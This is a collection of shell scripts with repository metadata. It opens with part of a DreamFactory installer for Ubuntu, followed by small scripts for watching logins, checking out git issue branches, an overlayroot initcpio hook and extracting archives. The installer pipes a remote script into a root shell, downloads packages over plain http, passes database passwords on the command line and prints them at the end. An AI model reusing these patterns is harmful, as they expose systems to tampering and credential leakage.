echo 'fastcgi_split_path_info ^(.+\.php)(/.+)$;' >> $WEB_PATH
echo "fastcgi_pass unix:/var/run/php/${PHP_VERSION}-fpm.sock;" >> $WEB_PATH
echo 'fastcgi_index index.php;' >> $WEB_PATH
echo 'fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;' >> $WEB_PATH
echo 'include fastcgi_params;}}' >> $WEB_PATH
service ${PHP_VERSION}-fpm restart && service nginx restart
echo -e "${GN}Nginx installed.\n${NC}" >&5
fi
fi
fi
### Step 4. Configure PHP development tools
echo -e "${GN}Step 4: Configuring PHP Extensions...\n${NC}" >&5
apt-get install -y php-pear
if (( $? >= 1 ))
then
echo -e "${RD}\n${ERROR_STRING}${NC}">&5
exit 1
fi
pecl channel-update pecl.php.net
### Install MCrypt
php -m | grep -E "^mcrypt"
if (( $? >= 1 ))
then
if [[ $MCRYPT == 0 ]]
then
printf "\n" | pecl install mcrypt-1.0.1
if (( $? >= 1 ))
then
echo -e "${RD}\nMcrypt extension installation error.${NC}" >&5
exit 1
fi
echo "extension=mcrypt.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/mcrypt.ini
phpenmod -s ALL mcrypt
else
apt-get install ${PHP_VERSION}-mcrypt
fi
php -m | grep -E "^mcrypt"
if (( $? >= 1 ))
then
echo -e "${RD}\nMcrypt installation error.${NC}" >&5
fi
fi
### Install MongoDB drivers
php -m | grep -E "^mongodb"
if (( $? >= 1 ))
then
pecl install mongodb
if (( $? >= 1 ))
then
echo -e "${RD}\nMongo DB extension installation error.${NC}" >&5
exit 1
fi
echo "extension=mongodb.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/mongodb.ini
phpenmod -s ALL mongodb
php -m | grep -E "^mongodb"
if (( $? >= 1 ))
then
echo -e "${RD}\nMongoDB installation error.${NC}" >&5
fi
fi
### Install MS SQL Drivers
php -m | grep -E "^sqlsrv"
if (( $? >= 1 ))
then
curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add -
if (( $CURRENT_OS == 16 ))
then
curl https://packages.microsoft.com/config/ubuntu/16.04/prod.list > /etc/apt/sources.list.d/mssql-release.list
elif (( $CURRENT_OS == 18 ))
then
curl https://packages.microsoft.com/config/ubuntu/18.04/prod.list > /etc/apt/sources.list.d/mssql-release.list
else
echo -e "${RD} The script support only Ubuntu 16 and 18 versions. Exit.\n ${NC}">&5
exit 1
fi
apt-get update
ACCEPT_EULA=Y apt-get install -y msodbcsql17 mssql-tools unixodbc-dev
pecl install sqlsrv
if (( $? >= 1 ))
then
echo -e "${RD}\nMS SQL Server extension installation error.${NC}" >&5
exit 1
fi
echo "extension=sqlsrv.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/sqlsrv.ini
phpenmod -s ALL sqlsrv
php -m | grep -E "^sqlsrv"
if (( $? >= 1 ))
then
echo -e "${RD}\nMS SQL Server extension installation error.${NC}" >&5
fi
fi
### DRIVERS FOR MSSQL (pdo_sqlsrv)
php -m | grep -E "^pdo_sqlsrv"
if (( $? >= 1 ))
then
pecl install pdo_sqlsrv
if (( $? >= 1 ))
then
echo -e "${RD}\npdo_sqlsrv extension installation error.${NC}" >&5
exit 1
fi
echo "extension=pdo_sqlsrv.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/pdo_sqlsrv.ini
phpenmod -s ALL pdo_sqlsrv
php -m | grep -E "^pdo_sqlsrv"
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install pdo_sqlsrv extension${NC}" >&5
fi
fi
### DRIVERS FOR ORACLE ( ONLY WITH KEY --with-oracle )
php -m | grep -E "^oci8"
if (( $? >= 1 ))
then
if [[ $ORACLE == TRUE ]]
then
echo -e "${MG}Enter path to the Oracle drivers: [./]${NC} " >&5
read DRIVERS_PATH
if [[ -z $DRIVERS_PATH ]]
then
DRIVERS_PATH="."
fi
unzip "$DRIVERS_PATH/instantclient-*.zip" -d /opt/oracle
if (( $? == 0 ))
then
echo -e "${GN}Drivers found.\n${NC}" >&5
apt install -y libaio1
echo "/opt/oracle/instantclient_18_3" > /etc/ld.so.conf.d/oracle-instantclient.conf
ldconfig
printf "instantclient,/opt/oracle/instantclient_18_3\n" | pecl install oci8
if (( $? >= 1 ))
then
echo -e "${RD}\nOracle instant client installation error${NC}" >&5
exit 1
fi
echo "extension=oci8.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/oci8.ini
phpenmod -s ALL oci8
php -m | grep oci8
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install oci8 extension.${NC}" >&5
fi
else
echo -e "${RD}Drivers not found. Skipping...\n${NC}" >&5
fi
unset DRIVERS_PATH
fi
fi
### DRIVERS FOR IBM DB2 PDO ( ONLY WITH KEY --with-db2 )
php -m | grep -E "^pdo_ibm"
if (( $? >= 1 ))
then
if [[ $DB2 == TRUE ]]
then
echo -e "${MG}Enter path to the IBM DB2 drivers: [./]${NC} " >&5
read DRIVERS_PATH
if [[ -z $DRIVERS_PATH ]]
then
DRIVERS_PATH="."
fi
tar xzf $DRIVERS_PATH/ibm_data_server_driver_package_linuxx64_v11.1.tar.gz -C /opt/
if (( $? == 0 ))
then
echo -e "${GN}Drivers found.\n${NC}" >&5
apt install -y ksh
chmod +x /opt/dsdriver/installDSDriver
/usr/bin/ksh /opt/dsdriver/installDSDriver
ln -s /opt/dsdriver/include /include
git clone https://github.com/dreamfactorysoftware/PDO_IBM-1.3.4-patched.git /opt/PDO_IBM-1.3.4-patched
cd /opt/PDO_IBM-1.3.4-patched/
phpize
./configure --with-pdo-ibm=/opt/dsdriver/lib
make && make install
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not make pdo_ibm extension.${NC}" >&5
exit 1
fi
echo "extension=pdo_ibm.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/pdo_ibm.ini
phpenmod -s ALL pdo_ibm
php -m | grep pdo_ibm
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install pdo_ibm extension.${NC}" >&5
else
### DRIVERS FOR IBM DB2 ( ONLY WITH KEY --with-db2 )
php -m | grep -E "^ibm_db2"
if (( $? >= 1 ))
then
printf "/opt/dsdriver/ \n" | pecl install ibm_db2
if (( $? >= 1 ))
then
echo -e "${RD}\nibm_db2 extension installation error.${NC}" >&5
exit 1
fi
echo "extension=ibm_db2.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/ibm_db2.ini
phpenmod -s ALL ibm_db2
php -m | grep ibm_db2
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install ibm_db2 extension.${NC}" >&5
fi
fi
fi
else
echo -e "${RD}Drivers not found. Skipping...\n${NC}" >&5
fi
unset DRIVERS_PATH
cd $CURRENT_PATH
rm -rf /opt/PDO_IBM-1.3.4-patched
fi
fi
### DRIVERS FOR CASSANDRA ( ONLY WITH KEY --with-cassandra )
php -m | grep -E "^cassandra"
if (( $? >= 1 ))
then
if [[ $CASSANDRA == TRUE ]]
then
apt install -y cmake libgmp-dev
git clone https://github.com/datastax/php-driver.git /opt/cassandra
cd /opt/cassandra/
git checkout v1.3.2 && git pull origin v1.3.2
wget http://downloads.datastax.com/cpp-driver/ubuntu/18.04/cassandra/v2.10.0/cassandra-cpp-driver-dbg_2.10.0-1_amd64.deb
wget http://downloads.datastax.com/cpp-driver/ubuntu/18.04/cassandra/v2.10.0/cassandra-cpp-driver-dev_2.10.0-1_amd64.deb
wget http://downloads.datastax.com/cpp-driver/ubuntu/18.04/cassandra/v2.10.0/cassandra-cpp-driver_2.10.0-1_amd64.deb
wget http://downloads.datastax.com/cpp-driver/ubuntu/18.04/dependencies/libuv/v1.23.0/libuv1-dbg_1.23.0-1_amd64.deb
wget http://downloads.datastax.com/cpp-driver/ubuntu/18.04/dependencies/libuv/v1.23.0/libuv1-dev_1.23.0-1_amd64.deb
wget http://downloads.datastax.com/cpp-driver/ubuntu/18.04/dependencies/libuv/v1.23.0/libuv1_1.23.0-1_amd64.deb
dpkg -i *.deb
if (( $? >= 1 ))
then
echo -e "${RD}\ncassandra extension installation error.${NC}" >&5
exit 1
fi
sed -i "s/7.1.99/7.2.99/" ./ext/package.xml
pecl install ./ext/package.xml
if (( $? >= 1 ))
then
echo -e "${RD}\ncassandra extension installation error.${NC}" >&5
exit 1
fi
echo "extension=cassandra.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/cassandra.ini
phpenmod -s ALL cassandra
php -m | grep cassandra
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install ibm_db2 extension.${NC}" >&5
fi
cd $CURRENT_PATH
rm -rf /opt/cassandra
fi
fi
### INSTALL IGBINARY EXT.
php -m | grep -E "^igbinary"
if (( $? >= 1 ))
then
pecl install igbinary
if (( $? >= 1 ))
then
echo -e "${RD}\nigbinary extension installation error.${NC}" >&5
exit 1
fi
echo "extension=igbinary.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/igbinary.ini
phpenmod -s ALL igbinary
php -m | grep igbinary
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install ibm_db2 extension.${NC}" >&5
fi
fi
### INSTALL PYTHON BUNCH
apt install -y python python-pip
pip list | grep bunch
if (( $? >= 1 ))
then
pip install bunch
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install python bunch extension.${NC}" >&5
fi
fi
### Install Node.js
node -v
if (( $? >= 1 ))
then
curl -sL https://deb.nodesource.com/setup_10.x | bash -
apt-get install -y nodejs
if (( $? >= 1 ))
then
echo -e "${RD}\n${ERROR_STRING}${NC}" >&5
exit 1
fi
NODE_PATH=$(whereis node | cut -d" " -f2)
fi
### INSTALL PCS
php -m | grep -E "^pcs"
if (( $? >= 1 ))
then
pecl install pcs-1.3.3
if (( $? >= 1 ))
then
echo -e "${RD}\npcs extension installation error..${NC}" >&5
exit 1
fi
echo "extension=pcs.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/pcs.ini
phpenmod -s ALL pcs
php -m | grep pcs
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install pcs extension.${NC}" >&5
fi
fi
### INSTALL COUCHBASE
php -m | grep -E "^couchbase"
if (( $? >= 1 ))
then
if (( $CURRENT_OS == 16 ))
then
wget -P /tmp http://packages.couchbase.com/releases/couchbase-release/couchbase-release-1.0-4-amd64.deb
dpkg -i /tmp/couchbase-release-1.0-4-amd64.deb
elif (( $CURRENT_OS == 18 ))
then
wget -O - http://packages.couchbase.com/ubuntu/couchbase.key | apt-key add -
echo "deb http://packages.couchbase.com/ubuntu bionic bionic/main" > /etc/apt/sources.list.d/couchbase.list
fi
apt-get update
apt install -y libcouchbase-dev build-essential zlib1g-dev
pecl install couchbase
if (( $? >= 1 ))
then
echo -e "${RD}\ncouchbase extension installation error.${NC}" >&5
exit 1
fi
echo "extension=couchbase.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/xcouchbase.ini
phpenmod -s ALL xcouchbase
php -m | grep couchbase
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install couchbase extension.${NC}" >&5
fi
fi
if [[ $APACHE == TRUE ]]
then
service apache2 reload
else
service ${PHP_VERSION}-fpm reload
fi
echo -e "${GN}PHP Extensions configured.\n${NC}" >&5
### Step 5. Installing Composer
echo -e "${GN}Step 5: Installing Composer...\n${NC}" >&5
curl -sS https://getcomposer.org/installer -o /tmp/composer-setup.php
php /tmp/composer-setup.php --install-dir=/usr/local/bin --filename=composer
if (( $? >= 1 ))
then
echo -e "${RD}\n${ERROR_STRING}${NC}" >&5
exit 1
fi
echo -e "${GN}Composer installed.\n${NC}" >&5
### Step 6. Installing MySQL
if [[ $MYSQL == TRUE ]] ### Only with key --with-mysql
then
echo -e "${GN}Step 6: Installing System Database for DreamFactory...\n${NC}" >&5
dpkg -l | grep mysql | cut -d " " -f 3 | grep -E "^mysql" | grep -E -v "^mysql-client"
CHECK_MYSQL_INSTALLATION=$(echo $?)
ps aux | grep -v grep | grep -E "^mysql"
CHECK_MYSQL_PROCESS=$(echo $?)
lsof -i :3306 | grep LISTEN
CHECK_MYSQL_PORT=$(echo $?)
if (( $CHECK_MYSQL_PROCESS == 0 )) || (( $CHECK_MYSQL_INSTALLATION == 0 )) || (( $CHECK_MYSQL_PORT == 0 ))
then
echo -e "${RD}MySQL Database detected in the system. Skipping installation. \n${NC}" >&5
DB_FOUND=TRUE
else
if (( $CURRENT_OS == 16 ))
then
apt-key adv --recv-keys --keyserver hkp://keyserver.ubuntu.com:80 0xF1656F24C74CD1D8
add-apt-repository 'deb [arch=amd64,arm64,i386,ppc64el] http://mariadb.petarmaric.com/repo/10.3/ubuntu xenial main'
elif (( $CURRENT_OS == 18 ))
then
apt-key adv --recv-keys --keyserver hkp://keyserver.ubuntu.com:80 0xF1656F24C74CD1D8
add-apt-repository 'deb [arch=amd64,arm64,ppc64el] http://mariadb.petarmaric.com/repo/10.3/ubuntu bionic main'
else
echo -e "${RD} The script support only Ubuntu 16 and 18 versions. Exit.\n ${NC}" >&5
exit 1
fi
apt-get update
echo -e "${MG}Please choose a strong MySQL root user password: ${NC}" >&5
read DB_PASS
if [[ -z $DB_PASS ]]
then
until [[ ! -z $DB_PASS ]]
do
echo -e "${RD}The password can't be empty!${NC}" >&5
read DB_PASS
done
fi
echo -e "${GN}\nPassword accepted.${NC}\n" >&5
# Disable interactive mode in installation mariadb. Set generated above password.
export DEBIAN_FRONTEND="noninteractive"
debconf-set-selections <<< "mariadb-server mysql-server/root_password password $DB_PASS"
debconf-set-selections <<< "mariadb-server mysql-server/root_password_again password $DB_PASS"
apt-get install -y mariadb-server
if (( $? >= 1 ))
then
echo -e "${RD}\n${ERROR_STRING}${NC}" >&5
exit 1
fi
service mariadb start
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not start MariaDB.. Exit ${NC}" >&5
exit 1
fi
fi
echo -e "${GN}Database for DreamFactory installed.\n${NC}" >&5
### Step 7. Configuring DreamFactory system database
echo -e "${GN}Step 7: Configure DreamFactory system database.\n${NC}" >&5
DB_INSTALLED=FALSE
# The MySQL database has already been installed, so let's configure
# the DreamFactory system database.
if [[ $DB_FOUND == TRUE ]]
then
echo -e "${MG}Is DreamFactory MySQL system database already configured? [Yy/Nn] ${NC}" >&5
read DB_ANSWER
if [[ -z $DB_ANSWER ]]
then
DB_ANSWER=Y
fi
if [[ $DB_ANSWER =~ ^[Yy]$ ]]
then
DB_INSTALLED=TRUE
# MySQL system database is not installed, but MySQL is, so let's
# prompt the user for the root password.
else
echo -e "\n${MG}Enter MySQL root password: ${NC} " >&5
read DB_PASS
# Test DB access
mysql -h localhost -u root -p$DB_PASS -e"quit"
if (( $? >= 1 ))
then
ACCESS=FALSE
TRYS=0
until [[ $ACCESS == TRUE ]]
do
echo -e "${RD}\nPassword incorrect!\n ${NC}" >&5
echo -e "${MG}Enter root user password:\n ${NC}" >&5
read DB_PASS
mysql -h localhost -u root -p$DB_PASS -e"quit"
if (( $? == 0 ))
then
ACCESS=TRUE
fi
TRYS=$((TRYS + 1))
if (( $TRYS == 3 ))
then
echo -e "\n${RD}Exit.\n${NC}" >&5
exit 1
fi
done
fi
fi
fi
# If the DreamFactory system database not already installed,
# let's install it.
if [[ $DB_INSTALLED == FALSE ]]
then
# Test DB access
mysql -h localhost -u root -p$DB_PASS -e"quit"
if (( $? >= 1 ))
then
echo -e "${RD}Connection to Database failed. Exit \n${NC}" >&5
exit 1
fi
echo -e "\n${MG}What would you like to name your system database? (e.g. dreamfactory) ${NC}" >&5
read DF_SYSTEM_DB
if [[ -z $DF_SYSTEM_DB ]]
then
until [[ ! -z $DF_SYSTEM_DB ]]
do
echo -e "\n${RD}The name can't be empty!${NC}" >&5
read DF_SYSTEM_DB
done
fi
echo "CREATE DATABASE ${DF_SYSTEM_DB};" | mysql -u root -p${DB_PASS} 2>&5
if (( $? >= 1 ))
then
echo -e "\n${RD}Creating database error. Exit${NC}" >&5
exit 1
fi
echo -e "\n${MG}Please create a MySQL DreamFactory system database user name (e.g. dfadmin): ${NC}" >&5
read DF_SYSTEM_DB_USER
if [[ -z $DF_SYSTEM_DB_USER ]]
then
until [[ ! -z $DF_SYSTEM_DB_USER ]]
do
echo -e "${RD}The name can't be empty!${NC}" >&5
read DF_SYSTEM_DB_USER
done
fi
echo -e "\n${MG}Please create a secure MySQL DreamFactory system database user password: ${NC}" >&5
read DF_SYSTEM_DB_PASSWORD
if [[ -z $DF_SYSTEM_DB_PASSWORD ]]
then
until [[ ! -z $DF_SYSTEM_DB_PASSWORD ]]
do
echo -e "${RD}The name can't be empty!${NC}" >&5
read DF_SYSTEM_DB_PASSWORD
done
fi
# Generate password for user in DB
echo "GRANT ALL PRIVILEGES ON ${DF_SYSTEM_DB}.* to \"${DF_SYSTEM_DB_USER}\"@\"localhost\" IDENTIFIED BY \"${DF_SYSTEM_DB_PASSWORD}\";" | mysql -u root -p${DB_PASS} 2>&5
if (( $? >= 1 ))
then
echo -e "\n${RD}Creating new user error. Exit${NC}" >&5
exit 1
fi
echo "FLUSH PRIVILEGES;" | mysql -u root -p${DB_PASS}
echo -e "\n${GN}Database configuration finished.\n${NC}" >&5
else
echo -e "${GN}Skipping...\n${NC}" >&5
fi
else
echo -e "${GN}Step 6: Skipping DreamFactory system database installation.\n" >&5
echo -e "Step 7: Skipping DreamFactory system database configuration.\n${NC}" >&5
fi
### Step 8. Install DreamFactory
echo -e "${GN}Step 8: Installing DreamFactory...\n ${NC}" >&5
ls -d /opt/dreamfactory
if (( $? >= 1 ))
then
mkdir -p /opt/dreamfactory
git clone -b 3.0-beta https://github.com/dreamfactorysoftware/dreamfactory.git /opt/dreamfactory
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not clone DreamFactory repository. Exiting. ${NC}" >&5
exit 1
fi
DF_CLEAN_INSTALLATION=TRUE
else
echo -e "${RD}DreamFactory detected.\n${NC}" >&5
DF_CLEAN_INSTALLATION=FALSE
fi
if [[ $DF_CLEAN_INSTALLATION == FALSE ]]
then
ls /opt/dreamfactory/composer.{json,lock,json-dist}
if (( $? == 0 ))
then
echo -e "${RD}Would you like to upgrade your instance? [Yy/Nn]${NC}" >&5
read LICENSE_FILE_ANSWER
if [[ -z $LICENSE_FILE_ANSWER ]]
then
LICENSE_FILE_ANSWER=N
fi
LICENSE_FILE_EXIST=TRUE
fi
fi
if [[ $LICENSE_FILE_EXIST == TRUE ]]
then
if [[ $LICENSE_FILE_ANSWER =~ ^[Yy]$ ]]
then
echo -e "${MG}\nEnter path to license files: [./]${NC}" >&5
read LICENSE_PATH
if [[ -z $LICENSE_PATH ]]
then
LICENSE_PATH="."
fi
ls $LICENSE_PATH/composer.{json,lock,json-dist}
if (( $? >= 1 ))
then
echo -e "${RD}\nLicenses not found. Skipping.\n${NC}" >&5
else
cp $LICENSE_PATH/composer.{json,lock,json-dist} /opt/dreamfactory/
LICENSE_INSTALLED=TRUE
echo -e "\n${GN}Licenses file installed. ${NC}\n" >&5
echo -e "${GN}Installing DreamFactory...\n${NC}" >&5
fi
else
echo -e "\n${RD}Skipping...\n${NC}" >&5
fi
else
echo -e "${MG}Do you have a commercial DreamFactory license? [Yy/Nn]${NC} " >&5
read LICENSE_FILE_ANSWER
if [[ -z $LICENSE_FILE_ANSWER ]]
then
LICENSE_FILE_ANSWER=N
fi
if [[ $LICENSE_FILE_ANSWER =~ ^[Yy]$ ]]
then
echo -e "${MG}\nEnter path to license files: [./]${NC}" >&5
read LICENSE_PATH
if [[ -z $LICENSE_PATH ]]
then
LICENSE_PATH="."
fi
ls $LICENSE_PATH/composer.{json,lock,json-dist}
if (( $? >= 1 ))
then
echo -e "${RD}\nLicenses not found. Skipping.\n${NC}" >&5
echo -e "${RD}Installing DreamFactory OSS version...\n${NC}" >&5
else
cp $LICENSE_PATH/composer.{json,lock,json-dist} /opt/dreamfactory/
LICENSE_INSTALLED=TRUE
echo -e "\n${GN}Licenses file installed. ${NC}\n" >&5
echo -e "${GN}Installing DreamFactory...\n${NC}" >&5
fi
else
echo -e "\n${RD}Installing DreamFactory OSS version.\n${NC}" >&5
fi
fi
chown -R $CURRENT_USER /opt/dreamfactory && cd /opt/dreamfactory
# If Oracle is not installed, add the --ignore-platform-reqs option
# to composer command
if [[ $ORACLE == TRUE ]]
then
sudo -u $CURRENT_USER bash -c "/usr/local/bin/composer install --no-dev"
else
sudo -u $CURRENT_USER bash -c "/usr/local/bin/composer install --no-dev --ignore-platform-reqs"
fi
### Shutdown silent mode because php artisan df:setup and df:env will get troubles with prompts.
exec 1>&5 5>&-
if [[ $DB_INSTALLED == FALSE ]]
then
sudo -u $CURRENT_USER bash -c "php artisan df:env -q \
--db_connection=mysql \
--db_host=127.0.0.1 \
--db_port=3306 \
--db_database=$(echo $DF_SYSTEM_DB) \
--db_username=$(echo $DF_SYSTEM_DB_USER) \
--db_password=$(echo $DF_SYSTEM_DB_PASSWORD | sed 's/['\'']//g')"
sed -i 's/\#DB\_CHARSET\=/DB\_CHARSET\=utf8/g' .env
sed -i 's/\#DB\_COLLATION\=/DB\_COLLATION\=utf8\_unicode\_ci/g' .env
echo -e "\n"
MYSQL_INSTALLED=TRUE
elif [[ ! $MYSQL == TRUE && $DF_CLEAN_INSTALLATION == TRUE ]] || [[ $DB_INSTALLED == TRUE ]]
then
sudo -u $CURRENT_USER bash -c "php artisan df:env"
if [[ $DB_INSTALLED == TRUE ]]
then
sed -i 's/\#DB\_CHARSET\=/DB\_CHARSET\=utf8/g' .env
sed -i 's/\#DB\_COLLATION\=/DB\_COLLATION\=utf8\_unicode\_ci/g' .env
fi
fi
if [[ $DF_CLEAN_INSTALLATION == TRUE ]]
then
sudo -u $CURRENT_USER bash -c "php artisan df:setup"
fi
if [[ $LICENSE_INSTALLED == TRUE || $DF_CLEAN_INSTALLATION == FALSE ]]
then
php artisan migrate --seed
sudo -u $CURRENT_USER bash -c "php artisan config:clear -q"
if [[ $LICENSE_INSTALLED == TRUE ]]
then
grep DF_LICENSE_KEY .env > /dev/null 2>&1 # Check for existing key.
if (( $? == 0 ))
then
echo -e "\n${RD}The license key already installed. Are you want to install a new key? [Yy/Nn]${NC}"
read KEY_ANSWER
if [[ -z $KEY_ANSWER ]]
then
KEY_ANSWER=N
fi
NEW_KEY=TRUE
fi
if [[ $NEW_KEY == TRUE ]]
then
if [[ $KEY_ANSWER =~ ^[Yy]$ ]] #Install new key
then
CURRENT_KEY=$(grep DF_LICENSE_KEY .env)
echo -e "${MG}\nPlease provide your new license key:${NC}"
read LICENSE_KEY
size=${#LICENSE_KEY}
if [[ -z $LICENSE_KEY ]]
then
until [[ ! -z $LICENSE_KEY ]]
do
echo -e "${RD}\nThe field can't be empty!${NC}"
read LICENSE_KEY
size=${#LICENSE_KEY}
done
elif (( $size != 32 ))
then
until (( $size == 32 ))
do
echo -e "${RD}\nInvalid License Key provided${NC}"
echo -e "${MG}\nPlease provide your license key:${NC}"
read LICENSE_KEY
size=${#LICENSE_KEY}
done
fi
###Change license key in .env file
sed -i "s/$CURRENT_KEY/DF_LICENSE_KEY=$LICENSE_KEY/" .env
else
echo -e "${RD}\nSkipping...${NC}" #Skip if key found in .env file and no need to update
fi
else
echo -e "${MG}\nPlease provide your license key:${NC}" #Install key if not found existing key.
read LICENSE_KEY
size=${#LICENSE_KEY}
if [[ -z $LICENSE_KEY ]]
then
until [[ ! -z $LICENSE_KEY ]]
do
echo -e "${RD}The field can't be empty!${NC}"
read LICENSE_KEY
size=${#LICENSE_KEY}
done
elif (( $size != 32 ))
then
until (( $size == 32 ))
do
echo -e "${RD}\nInvalid License Key provided${NC}"
echo -e "${MG}\nPlease provide your license key:${NC}"
read LICENSE_KEY
size=${#LICENSE_KEY}
done
fi
###Add license key to .env file
echo -e "\nDF_LICENSE_KEY=${LICENSE_KEY}" >> .env
fi
fi
fi
chmod -R 2775 /opt/dreamfactory/
chown -R www-data:$CURRENT_USER /opt/dreamfactory/
### Uncomment nodejs in .env file
grep -E "^#DF_NODEJS_PATH" .env > /dev/null
if (( $? == 0 ))
then
sed -i "s,\#DF_NODEJS_PATH=/usr/local/bin/node,DF_NODEJS_PATH=$NODE_PATH," .env
fi
sudo -u $CURRENT_USER bash -c "php artisan cache:clear -q"
echo -e "\n${GN}Installation finished! ${NC}"
if [[ $DEBUG == TRUE ]]
then
echo -e "\n${RD}The log file saved in: /tmp/dreamfactory_installer.log ${NC}"
fi
### Summary table
if [[ $MYSQL_INSTALLED == TRUE ]]
then
echo -e "\n "
echo -e "${MG}******************************"
echo -e " DB for system table: mysql "
echo -e " DB host: 127.0.0.1 "
echo -e " DB port: 3306 "
if [[ ! $DB_FOUND == TRUE ]]
then
echo -e " DB root password: $DB_PASS"
fi
echo -e " DB name: $(echo $DF_SYSTEM_DB) "
echo -e " DB user: $(echo $DF_SYSTEM_DB_USER)"
echo -e " DB password: $(echo $DF_SYSTEM_DB_PASSWORD)"
echo -e "******************************${NC}\n"
fi
exit 0
| true |
9de9b132931119d1bb8da0a1b1a63019e7a25ee9 | Shell | jeremybobbin/thunpren | /5/watchfor | UTF-8 | 168 | 3.328125 | 3 | [] | no_license | #!/bin/sh
# watchfor -- poll who(1) once a minute until one of the named users logs in.
case $# in
0)	echo 'Usage: watchfor person [person [person [...]]]' >&2
	exit 1	# without this, the empty pattern below matches any who(1) line
esac
# Build an alternation pattern: "alice bob" -> "alice|bob".
people=$(echo $* | sed 's/ /|/g')
until who | grep -E "$people"
do
	sleep 60
done
| true |
2be45c8287770546d997b658d2c976ff8845695e | Shell | KoharaKazuya/dotfiles | /bin/git-checkout-issue | UTF-8 | 695 | 3.84375 | 4 | [] | no_license | #!/bin/sh
set -eu
# Check the argument count: exactly one issue number is required
# (under `set -e` a failing test aborts the script).
[ "$#" -eq 1 ]
# Check that the argument is a positive integer.
expr "$1" + 1 1> /dev/null 2>&1
[ "$1" -gt 0 ] 1> /dev/null 2>&1
# Abort if there are uncommitted modified files
# (`_modified-files-guard` is a user-defined git alias/subcommand).
git _modified-files-guard
# Bring the checkout up to date (`cc` is a custom git alias -- presumably
# a fetch/pull; confirm in the user's gitconfig).
git cc
# Check whether the issue branch already exists.
branch_name="issue/#$1"
if git rev-parse "$branch_name" 1> /dev/null 2>&1; then
	# Warn, then check out the existing branch (`co` alias).
	printf "\e[0;33mwarning: A branch named '%s' already exists.\n" "$branch_name" 1>&2
	git co "$branch_name"
else
	# Create the issue branch (`_processing` wraps the command with a
	# status message; `cob` is presumably checkout -b -- confirm).
	git _processing 'coi' "Creating branch $branch_name" git cob "$branch_name"
fi
| true |
1e75ffd364fb19aef6ce7ce8ec4e9238ce641ea4 | Shell | Antynea/raspi-overlayroot | /initcpio-install-overlayroot | UTF-8 | 120 | 2.578125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/bash
# mkinitcpio install hook for overlayroot.

# Register the matching runtime hook script in the generated initramfs.
build() {
  add_runscript
}

# One-line description shown by `mkinitcpio -H`.
help() {
  cat <<'EOF'
This hook overlays a tmpfs on top of a readonly root.
EOF
}
| true |
d8593fcd4fff47f898d537d6de8f843a8871191c | Shell | wafflesnatcha/bin | /extract.sh | UTF-8 | 1,263 | 4.3125 | 4 | [] | no_license | #!/usr/bin/env bash
# `extract.sh` by Scott Buchanan <http://wafflesnatcha.github.com>
# Extracts each FILE argument with the tool matching its (lower-cased)
# extension; arguments that are not regular files are silently skipped.
SCRIPT_NAME="extract.sh"
SCRIPT_VERSION="r2 2012-09-10"
# Print name/version and usage text to stdout.
usage() { cat <<EOF
$SCRIPT_NAME $SCRIPT_VERSION
Automatically extract compressed files of various types.
Usage: ${0##*/} FILE...
EOF
}
# ERROR [message] [exit-code] -- print "script: message" to stderr when a
# message is given, and exit with the given code when one is supplied.
# NOTE(review): "[[ $2 > -1 ]]" is a lexicographic string comparison, not a
# numeric one; it happens to work for the positive codes used below, but
# (( $2 > -1 )) was probably intended.
ERROR() { [[ $1 ]] && echo "$SCRIPT_NAME: $1" 1>&2; [[ $2 > -1 ]] && exit $2; }
# Option parsing: stop at "--" or at the first non-option argument.
while (($#)); do
	case $1 in
	-h|--help) usage; exit 0 ;;
	--) shift; break ;;
	-*|--*) ERROR "unknown option ${1}" 1 ;;
	*) break ;;
	esac
	shift
done
# No files given: show usage and exit successfully.
[[ ! "$1" ]] && { usage; exit 0; }
for f in "$@"; do
	# Skip anything that is not a regular file.
	[[ ! -f "$f" ]] && continue
	# Match on the lower-cased name so extensions are case-insensitive;
	# the commands below still operate on the original "$f".
	case "$(echo $f | tr '[A-Z]' '[a-z]')" in
	*.tar.bz2|*.tbz2|*.tbz)
		tar -xjvpf "$f"
		;;
	*.tar.gz|*.tgz)
		tar -xzvpf "$f"
		;;
	*.tar.xz|*.txz)
		# No explicit compression flag: relies on tar's automatic
		# compression detection -- TODO confirm on the target tar.
		tar -xvpf "$f"
		;;
	*.7z)
		# Prefer 7z, fall back to 7zr if only that is installed.
		bin=$(which 7z 7zr 2>/dev/null | head -n1)
		[[ ! $bin ]] && ERROR "couldn't find path to 7z or 7zr" 3
		"$bin" x "$f"
		;;
	*.bz2|*.bzip2|*.bz)
		bzip2 -dkv "$f"
		;;
	*.cpio)
		# ditto(1) is macOS-specific.
		ditto -x "$f" "${f%%.cpio}"
		;;
	*.cpgz)
		ditto -Vxz "$f" "${f%%.cpgz}"
		;;
	*.gz|*.gzip)
		gzip -d "$f"
		;;
	*.rar)
		unrar x "$f"
		;;
	*.xar)
		xar -d "$f"
		;;
	*.xz)
		xz -dv "$f"
		;;
	*.zip|*.z01)
		unzip "$f"
		;;
	*) ERROR "don't know how to handle '$f'" 2 ;;
	esac
done
| true |
